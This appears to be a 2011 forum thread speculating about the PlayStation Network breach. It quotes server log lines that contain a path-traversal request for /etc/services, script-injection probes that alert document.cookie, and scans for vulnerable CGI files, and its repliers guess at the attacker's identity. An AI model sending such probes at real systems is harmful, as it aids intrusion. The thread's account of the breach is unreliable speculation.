Post: This is how PSN got hacked!
Options
04-26-2011, 10:26 PM
#1
ciunas
Insert User Title Here
Above is a screenshot of their PSN servers access logs. This log is created on the main server of the PlayStation Network. Likely many of you have no idea what exactly a log would be. Sony itself has this log file are also publicly retrievable through the URL. Mistake number two, perhaps? Here also some interesting logs:
Originally posted by another user
214.1.211.251 - - [15/Apr/2011: 9:40:11 -0700] "GET / OfficeScan / cgi / cgiChkMasterPwd.exe HTTP/1.1" 404 336 "-" "-"
178.202.110.92 - - [22/Apr/2011: 7:05:00 p.m. -0700] "GET / admin / cdr / counter.txt HTTP/1.1" 404 343 "-" "Mozilla/5.0 (compatible; Windows NT 6.1, de; rv: 1.9.2.16) Gecko/20110319 Firefox/3.6.16 "
214.1.211.251 - - [15/Apr/2011: 9:40:09 -0700] "GET / _vti_bin / fpcount.exe? Page = default.htm | Image = 3 | Digits = 15 HTTP/1.0" 404 325 "- "" - "
214.1.211.251 - - [15/Apr/2011: 9:39:51 -0700] "GET / scripts / foxweb.exe / HTTP/1.0" 404 324 "-" "-"
214.1.211.251 - - [15/Apr/2011: 9:39:48 -0700] "GET / phpwebfilemgr / index.php? F =../../../ etc / services HTTP/1.0" 404 328 " - "" - "
178.202.110.92 - - [22/Apr/2011: 7:05:00 p.m. -0700] "GET / admin / cdr / counter.txt HTTP/1.1" 404 343 "-" "Mozilla/5.0 (compatible; Windows NT 6.1, de; rv: 1.9.2.16) Gecko/20110319 Firefox/3.6.16 "
214.1.211.251 - - [15/Apr/2011: 9:40:09 -0700] "GET / _vti_bin / fpcount.exe? Page = default.htm | Image = 3 | Digits = 15 HTTP/1.0" 404 325 "- "" - "
214.1.211.251 - - [15/Apr/2011: 9:39:51 -0700] "GET / scripts / foxweb.exe / HTTP/1.0" 404 324 "-" "-"
214.1.211.251 - - [15/Apr/2011: 9:39:48 -0700] "GET / phpwebfilemgr / index.php? F =../../../ etc / services HTTP/1.0" 404 328 " - "" - "
What we see here again include the use of an FVC, local file inclusion, in the last row. With this is that the ip 214.1.211.251, this is possibly the IP of the attacker. Nor has a number of Javascript injections occurred:
Originally posted by another user
214.1.211.251 - - [15/Apr/2011: 9:39:49 -0700] "GET / board.php? <script> FID = alert (document.cookie) </ script> HTTP/1.0" 404 314 "- "" - "
214.1.211.251 - - [15/Apr/2011: 9:39:38 -0700] "GET / servlet / webacc? User.id ="> <script> alert ('eeye2004'
</ script> HTTP/1.0 " 404 319 "-" "-"
214.1.211.251 - - [15/Apr/2011: 9:39:30 -0700] "GET / modules.php? Name = Reviews & rop = post & title =% 253cscript comment> alert 2528document.cookie%)% 253c/script> HTTP / 1.0 "404 316" - "" - "
214.1.211.251 - - [15/Apr/2011: 9:39:38 -0700] "GET / servlet / webacc? User.id ="> <script> alert ('eeye2004'
</ script> HTTP/1.0 " 404 319 "-" "-"214.1.211.251 - - [15/Apr/2011: 9:39:30 -0700] "GET / modules.php? Name = Reviews & rop = post & title =% 253cscript comment> alert 2528document.cookie%)% 253c/script> HTTP / 1.0 "404 316" - "" - "
It is frightening to know that Sony is so easy to hack, because come on Sony, FVC and Javascript injections? Really? This looks like the work of a 14 year old boy. Thanks to SKFU Blog for the announcement of the log.
You must login or register to view this content.
The following 7 users say thank you to ciunas for this useful post:
04-27-2011, 01:08 AM
#32
iTruceFret
[move]From now on, call me DRAGON.[/move]
Yeah whoever did this...is in deep ball**** with Sony. Not only did they, he, or she hack into their servers, but possibly stole CC information, which is a federal lawsuit. This isn't a DDos attack....this is WAAYY deeper. Whoever hacked this had balls bigger than anyone, and KNEW the consequences, and will now face them. Run and hide you peckerwood. You went too far with this one.
04-27-2011, 02:22 AM
#35
ClutchLikeBron
Do a barrel roll!
Originally posted by dakillers1
Why write something that has no relevance WHATSOEVER to the topic and is not helpful to anybody:n:
Im sry, but it does. The ip address is from columbus ohio so suck it nerd
Copyright © 2026, NextGenUpdate.
All Rights Reserved.
